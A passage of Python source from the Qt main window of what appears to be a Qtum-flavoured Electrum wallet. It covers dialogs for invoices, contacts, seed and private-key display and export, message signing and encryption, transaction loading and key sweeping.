AddressList(self) toolbar = l.create_toolbar(self.config) tab = self.create_list_tab(l, toolbar) toolbar_shown = bool(self.config.get('show_toolbar_addresses', False)) l.show_toolbar(toolbar_shown) return tab def create_utxo_tab(self): from .utxo_list import UTXOList self.utxo_list = UTXOList(self) return self.create_list_tab(self.utxo_list) def create_contacts_tab(self): from .contact_list import ContactList self.contact_list = l = ContactList(self) return self.create_list_tab(l) def remove_address(self, addr): if not self.question(_("Do you want to remove {} from your wallet?").format(addr)): return try: self.wallet.delete_address(addr) except UserFacingException as e: self.show_error(str(e)) else: self.need_update.set() # history, addresses, coins self.clear_receive_tab() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not self.question(_("Remove {} from your list of contacts?") .format(" + ".join(labels))): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_onchain_invoice(self, invoice: OnchainInvoice): amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit() d = WindowModalDialog(self, _("Onchain Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) grid.addWidget(QLabel(amount_str), 1, 1) if len(invoice.outputs) == 1: grid.addWidget(QLabel(_("Address") + ':'), 2, 0) grid.addWidget(QLabel(invoice.get_address()), 2, 1) else: outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs)) grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0) grid.addWidget(QLabel(outputs_str), 2, 1) grid.addWidget(QLabel(_("Description") + ':'), 3, 0) grid.addWidget(QLabel(invoice.message), 3, 1) if invoice.exp: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1) if invoice.bip70: pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70)) pr.verify(self.contacts) grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0) grid.addWidget(QLabel(pr.get_requestor()), 5, 1) grid.addWidget(QLabel(_("Signature") + ':'), 6, 0) grid.addWidget(QLabel(pr.get_verify_status()), 6, 1) def do_export(): key = pr.get_id() name = str(key) + '.bip70' fn = getSaveFileName( parent=self, title=_("Save invoice to file"), filename=name, filter="*.bip70", config=self.config, ) if not fn: return with open(fn, 'wb') as f: data = f.write(pr.raw) self.show_message(_('BIP70 invoice saved as {}').format(fn)) exportButton = EnterButton(_('Export'), do_export) buttons = Buttons(exportButton, CloseButton(d)) else: buttons = Buttons(CloseButton(d)) vbox.addLayout(grid) vbox.addLayout(buttons) d.exec_() def show_lightning_invoice(self, invoice: LNInvoice): lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP) d = WindowModalDialog(self, _("Lightning Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0) grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit() grid.addWidget(QLabel(amount_str), 1, 1) grid.addWidget(QLabel(_("Description") + ':'), 2, 0) grid.addWidget(QLabel(invoice.message), 2, 1) grid.addWidget(QLabel(_("Hash") + ':'), 3, 0) payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex()) payhash_e.addCopyButton(self.app) payhash_e.setReadOnly(True) vbox.addWidget(payhash_e) grid.addWidget(payhash_e, 3, 1) if invoice.exp: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1) vbox.addLayout(grid) invoice_e = ShowQRTextEdit(config=self.config) invoice_e.addCopyButton(self.app) invoice_e.setText(invoice.invoice) vbox.addWidget(invoice_e) vbox.addLayout(Buttons(CloseButton(d),)) d.exec_() def create_console_tab(self): from .console import Console self.console = console = Console() return console def update_console(self): console = self.console console.history = self.wallet.db.get("qt-console-history", []) console.history_index = len(console.history) console.updateNamespace({ 'wallet': self.wallet, 'network': self.network, 'plugins': self.gui_object.plugins, 'window': self, 'config': self.config, 'electrum': electrum, 'daemon': self.gui_object.daemon, 'util': util, 'bitcoin': bitcoin, 'lnutil': lnutil, }) c = commands.Commands( config=self.config, daemon=self.gui_object.daemon, network=self.network, callback=lambda: self.console.set_json(True)) methods = {} def mkfunc(f, method): return lambda *args, **kwargs: f(method, args, self.password_dialog, **{**kwargs, 'wallet': self.wallet}) for m in dir(c): if m[0]=='_' or m in ['network','wallet','config']: continue methods[m] = mkfunc(c._run, m) console.updateNamespace(methods) def create_status_bar(self): sb = QStatusBar() sb.setFixedHeight(35) self.balance_label = QLabel("Loading wallet...") self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse) self.balance_label.setStyleSheet("""QLabel { padding: 0 }""") sb.addWidget(self.balance_label) self.search_box = QLineEdit() self.search_box.textChanged.connect(self.do_search) self.search_box.hide() sb.addPermanentWidget(self.search_box) self.update_check_button = QPushButton("") self.update_check_button.setFlat(True) self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor)) self.update_check_button.setIcon(read_QIcon("update.png")) self.update_check_button.hide() sb.addPermanentWidget(self.update_check_button) self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog ) sb.addPermanentWidget(self.password_button) sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) ) self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog ) sb.addPermanentWidget(self.seed_button) self.lightning_button = None if self.wallet.has_lightning() and self.network: self.lightning_button = StatusBarButton(read_QIcon("lightning_disconnected.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog) sb.addPermanentWidget(self.lightning_button) self.update_lightning_icon() self.status_button = None if self.network: self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog) sb.addPermanentWidget(self.status_button) run_hook('create_status_bar', sb) self.setStatusBar(sb) def create_coincontrol_statusbar(self): self.coincontrol_sb = sb = QStatusBar() sb.setSizeGripEnabled(False) #sb.setFixedHeight(3 * char_width_in_lineedit()) sb.setStyleSheet('QStatusBar::item {border: None;} ' + ColorScheme.GREEN.as_stylesheet(True)) self.coincontrol_label = QLabel() self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred) self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse) sb.addWidget(self.coincontrol_label) clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None)) clear_cc_button.setStyleSheet("margin-right: 5px;") sb.addPermanentWidget(clear_cc_button) sb.setVisible(False) return sb def set_coincontrol_msg(self, msg: Optional[str]) -> None: if not msg: self.coincontrol_label.setText("") self.coincontrol_sb.setVisible(False) return self.coincontrol_label.setText(msg) self.coincontrol_sb.setVisible(True) def update_lightning_icon(self): if self.lightning_button is None: return if self.network.lngossip is None: return # display colorful lightning icon to signal connection self.lightning_button.setIcon(read_QIcon("lightning.png")) cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate() # self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}") progress_str = "??%" if progress_percent is not None: progress_str = f"{progress_percent}%" if progress_percent and progress_percent >= 100: self.lightning_button.setMaximumWidth(25) self.lightning_button.setText('') self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced.")) else: self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit()) self.lightning_button.setText(progress_str) self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n" "Payments are more likely to succeed with a more complete graph.")) def update_lock_icon(self): icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png") self.password_button.setIcon(icon) def update_buttons_on_seed(self): self.seed_button.setVisible(self.wallet.has_seed()) self.password_button.setVisible(self.wallet.may_have_password()) def change_password_dialog(self): from electrum.storage import StorageEncryptionVersion if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD: from .password_dialog import ChangePasswordDialogForHW d = ChangePasswordDialogForHW(self, self.wallet) ok, encrypt_file = d.run() if not ok: return try: hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption() except UserCancelled: return except BaseException as e: self.logger.exception('') self.show_error(repr(e)) return old_password = hw_dev_pw if self.wallet.has_password() else None new_password = hw_dev_pw if encrypt_file else None else: from .password_dialog import ChangePasswordDialogForSW d = ChangePasswordDialogForSW(self, self.wallet) ok, old_password, new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file) except InvalidPassword as e: self.show_error(str(e)) return except BaseException: self.logger.exception('Failed to update password') self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(32 * char_width_in_lineedit()) line2 = QLineEdit() line2.setFixedWidth(32 * char_width_in_lineedit()) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def show_wallet_info(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(500, 100) vbox = QVBoxLayout() wallet_type = self.wallet.db.get('wallet_type', '') if self.wallet.is_watching_only(): wallet_type += ' [{}]'.format(_('watching-only')) seed_available = _('True') if self.wallet.has_seed() else _('False') keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()] grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0) grid.addWidget(QLabel(str(seed_available)), 3, 1) if len(keystore_types) <= 1: grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0) ks_type = str(keystore_types[0]) if keystore_types else _('No keystore') grid.addWidget(QLabel(ks_type), 4, 1) # lightning grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0) if self.wallet.can_have_lightning(): grid.addWidget(QLabel(_('Enabled')), 5, 1) local_nodeid = QLabel(self.wallet.lnworker.node_keypair.pubkey.hex()) local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse) grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0) grid.addWidget(local_nodeid, 6, 1, 1, 3) else: grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1) grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2) vbox.addLayout(grid) labels_clayout = None if self.wallet.is_deterministic(): keystores = self.wallet.get_keystores() ks_stack = QStackedWidget() def select_ks(index): ks_stack.setCurrentIndex(index) # only show the combobox in case multiple accounts are available if len(keystores) > 1: def label(idx, ks): if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'): return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}' else: return _("keystore") + f' {idx+1}' labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())] on_click = lambda clayout: select_ks(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click) vbox.addLayout(labels_clayout.layout()) for ks in keystores: ks_w = QWidget() ks_vbox = QVBoxLayout() ks_vbox.setContentsMargins(0, 0, 0, 0) ks_w.setLayout(ks_vbox) mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config) mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) run_hook('show_xpub_button', mpk_text, ks) der_path_hbox = QHBoxLayout() der_path_hbox.setContentsMargins(0, 0, 0, 0) der_path_hbox.addWidget(QLabel(_("Derivation path") + ':')) der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown")) der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse) der_path_hbox.addWidget(der_path_text) der_path_hbox.addStretch() ks_vbox.addWidget(QLabel(_("Master Public Key"))) ks_vbox.addWidget(mpk_text) ks_vbox.addLayout(der_path_hbox) ks_stack.addWidget(ks_w) select_ks(0) vbox.addWidget(ks_stack) vbox.addStretch(1) btn_export_info = run_hook('wallet_info_buttons', self, dialog) btn_close = CloseButton(dialog) btns = Buttons(btn_export_info, btn_close) vbox.addLayout(btns) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) r = self.gui_object.daemon.delete_wallet(wallet_path) self.close() if r: self.show_error(_("Wallet removed: {}").format(basename)) else: self.show_error(_("Wallet file not found: {}").format(basename)) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(repr(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase, config=self.config) d.exec_() def show_qrcode(self, data, title = _("QR code"), parent=None, *, help_text=None, show_copy_text_btn=False): if not data: return d = QRDialog( data=data, parent=parent or self, title=title, help_text=help_text, show_copy_text_btn=show_copy_text_btn, config=self.config, ) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk = self.wallet.export_private_key(address, password) except Exception as e: self.logger.exception('') self.show_message(repr(e)) return xtype = bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk, config=self.config) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = _("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") + '\n\n' + \ _('The operation is undefined. Not just in Electrum, but in general.') @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message(_('Invalid Qtum address.')) return if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return if not self.wallet.is_mine(address): self.show_message(_('Address not in wallet.')) return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']: self.show_message(_('Cannot sign messages with this type of address:') + \ ' ' + txin_type + '\n\n' + self.msg_sign) return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): try: signature.setText(base64.b64encode(sig).decode('ascii')) except RuntimeError: # (signature) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message(_('Invalid Qtum address.')) return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = ecc.verify_message_with_address(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 2, 1) signature_e = QTextEdit() signature_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def sign_pod(self, address=''): d = WindowModalDialog(self, _('Sign POD')) d.setMinimumSize(450, 300) layout = QGridLayout(d) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 1, 0) layout.addWidget(address_e, 1, 1) staker_e = QLineEdit() layout.addWidget(QLabel(_('Staker')), 2, 0) layout.addWidget(staker_e, 2, 1) pod_e = QTextEdit() pod_e.setAcceptRichText(False) layout.addWidget(QLabel(_('POD')), 3, 0) layout.addWidget(pod_e, 3, 1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign_pod(address_e, staker_e, pod_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def do_sign_pod(self, address_e, staker_e, pod_e): staker = staker_e.text().strip() if not is_hash160(staker): try: addr_type, staker = b58_address_to_hash160(staker) except BaseException: raise Exception('invalid staker address') if addr_type != constants.net.ADDRTYPE_P2PKH: raise Exception('invalid staker address') staker = staker.hex() message_e = QTextEdit() message_e.setText(staker) self.do_sign(address_e, message_e, pod_e) @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) def setText(text): try: message_e.setText(text.decode('utf-8')) except RuntimeError: # (message_e) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=setText) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: public_key = ecc.ECPubkey(bfh(pubkey_e.text())) except BaseException as e: self.logger.exception('Invalid Public key') self.show_warning(_('Invalid Public key')) return encrypted = public_key.encrypt_message(message) encrypted_e.setText(encrypted.decode('ascii')) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() encrypted_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']: from electrum.transaction import tx_from_any try: return tx_from_any(data) except BaseException as e: self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e)) return def import_channel_backup(self, encrypted: str): if not self.question('Import channel backup?'): return try: self.wallet.lnbackups.import_channel_backup(encrypted) except Exception as e: self.show_error("failed to import backup" + '\n' + str(e)) return def read_tx_from_qrcode(self): from electrum import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except BaseException as e: self.show_error(repr(e)) return if not data: return # if the user scanned a bitcoin URI if str(data).startswith("qtum:"): self.pay_to_URI(data) return if data.startswith('channel_backup:'): self.import_channel_backup(data) return # else if the user scanned an offline signed tx tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self) -> Optional[Transaction]: fileName = getOpenFileName( parent=self, title=_("Select your transaction file"), filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY, config=self.config, ) if not fileName: return try: with open(fileName, "rb") as f: file_content = f.read() # type: Union[str, bytes] except (ValueError, IOError, os.error) as reason: self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): text = text_dialog( parent=self, title=_('Input raw transaction'), header_layout=_("Transaction:"), ok_label=_("Load transaction"), config=self.config, ) if not text: return tx = self.tx_from_text(text) if tx: self.show_transaction(tx) def do_process_from_text_channel_backup(self): text = text_dialog( parent=self, title=_('Input channel backup'), header_layout=_("Channel Backup:"), ok_label=_("Load backup"), config=self.config, ) if not text: return if text.startswith('channel_backup:'): self.import_channel_backup(text) def do_process_from_file(self): tx = self.read_tx_from_file() if tx: self.show_transaction(tx) def do_process_from_txid(self): from electrum import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() try: raw_tx = self.network.run_from_another_thread( self.network.get_transaction(txid, timeout=10)) except UntrustedServerReturnedError as e: self.logger.info(f"Error getting transaction from network: {repr(e)}") self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui()) return except Exception as e: self.show_message(_("Error getting transaction from network") + ":\n" + repr(e)) return else: tx = transaction.Transaction(raw_tx) self.show_transaction(tx) @protected def export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It cannot be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(980, 300) vbox = QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password) private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("Electrum was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(repr(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: os.chmod(fileName, 0o600) if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): def on_import(): self.need_update.set() import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import) def do_export_labels(self): export_meta_gui(self, _('labels'), self.wallet.export_labels) def import_invoices(self): import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update) def export_invoices(self): export_meta_gui(self, _('invoices'), self.wallet.export_invoices) def import_requests(self): import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update) def export_requests(self): export_meta_gui(self, _('requests'), self.wallet.export_requests) def import_contacts(self): import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update) def export_contacts(self): export_meta_gui(self, _('contacts'), self.contacts.export_file) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) hbox_top = QHBoxLayout() hbox_top.addWidget(QLabel(_("Enter private keys:"))) hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) vbox.addLayout(hbox_top) keys_e = ScanQRTextEdit(allow_multi=True, config=self.config) keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(*, raise_on_error=False): text = str(keys_e.toPlainText()) return keystore.get_private_keys(text, raise_on_error=raise_on_error) def on_edit(): valid_privkeys = False try: valid_privkeys = get_pk(raise_on_error=True) is not None except Exception as e: button.setToolTip(f'{_("Error")}: {repr(e)}') else: button.setToolTip('') button.setEnabled(get_address() is not None and valid_privkeys) on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_address) on_address(str(address_e.text())) if not d.exec_(): return # user pressed "sweep" addr = get_address() try: self.wallet.check_address_for_corruption(addr) except InternalAddressCorruption as e: self.show_error(str(e)) raise privkeys = get_pk() def on_success(result): coins, keypairs = result outputs = [PartialTxOutput.from_address_and_value(addr, value='!')] self.warn_if_watching_only() self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs) def on_failure(exc_info): self.on_error(exc_info) msg = _('Preparing sweep transaction...') task = lambda: self.network.run_from_another_thread( sweep_preparations(privkeys, self.network)) WaitingDialog(self, msg, task, on_success, on_failure) def _do_import(self, title, header_layout, func): text = text_dialog( parent=self, title=title, header_layout=header_layout, ok_label=_('Import'), allow_multi=True, config=self.config, ) if not text: return keys = str(text).split() good_inputs, bad_inputs = func(keys) if good_inputs: msg = '\n'.join(good_inputs[:10]) if len(good_inputs) > 10: msg += '\n...' self.show_message(_("The following addresses were added") + f' ({len(good_inputs)}):\n' + msg) if bad_inputs: msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10]) if len(bad_inputs) > 10: msg += '\n...' self.show_error(_("The following inputs could not be imported") + f' ({len(bad_inputs)}):\n' + msg) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses")+':' self._do_import(title, msg, self.wallet.import_addresses) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title = _('Import private keys') header_layout = QHBoxLayout() header_layout.addWidget(QLabel(_("Enter private keys")+':')) header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): from .settings_dialog import SettingsDialog d = SettingsDialog(self, self.config) self.alias_received_signal.connect(d.set_alias_color) d.exec_() 